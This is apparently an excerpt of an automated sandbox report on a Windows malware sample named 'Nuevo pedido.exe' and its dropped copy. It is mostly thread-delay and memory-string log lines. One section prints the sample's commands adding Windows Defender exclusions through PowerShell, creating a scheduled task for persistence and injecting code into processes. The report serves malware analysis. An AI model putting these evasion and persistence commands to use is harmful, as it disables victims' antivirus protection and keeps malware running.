Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595516s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595188s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594842s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594516s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594282s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594157s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -594028s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -593922s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -593801s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -593667s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595732
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594842
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594516
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594282
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594157
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594028
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593922
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593801
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593667

Source: Nuevo pedido.exe, 00000009.00000002.4136615734.0000000001286000.00000004.00000020.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4136708781.0000000001467000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory written: C:\Users\user\Desktop\Nuevo pedido.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory written: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"

Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT;@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(eU
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt:B
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8"
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\L-
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qyB
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt\'
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q w'
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLKO
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4}X
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8#9
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q UB
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd\|^
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhD$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|J8
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPTH
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(fA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxN
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPtf
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`3%
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qy>
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT;F
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q03a
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 3q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|l(
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 6-
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q VK
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8D`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$~n
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q9
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$<h
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,N0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD<E
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,nN
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD\c
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qle
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4\s
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpu/
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\*Z
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\,!
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd}J
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd],
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q W7
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|m&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q7Y
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8ej
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXc$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q sk
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd7n
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@S*
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@sH
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q9B
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD9G
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q9?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q9N
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8 X
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD:"
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<k;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtXk
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|&r
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLJF
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdy`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,+&
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLjd
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXq
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(c`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT\|,
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(">
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLK!
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
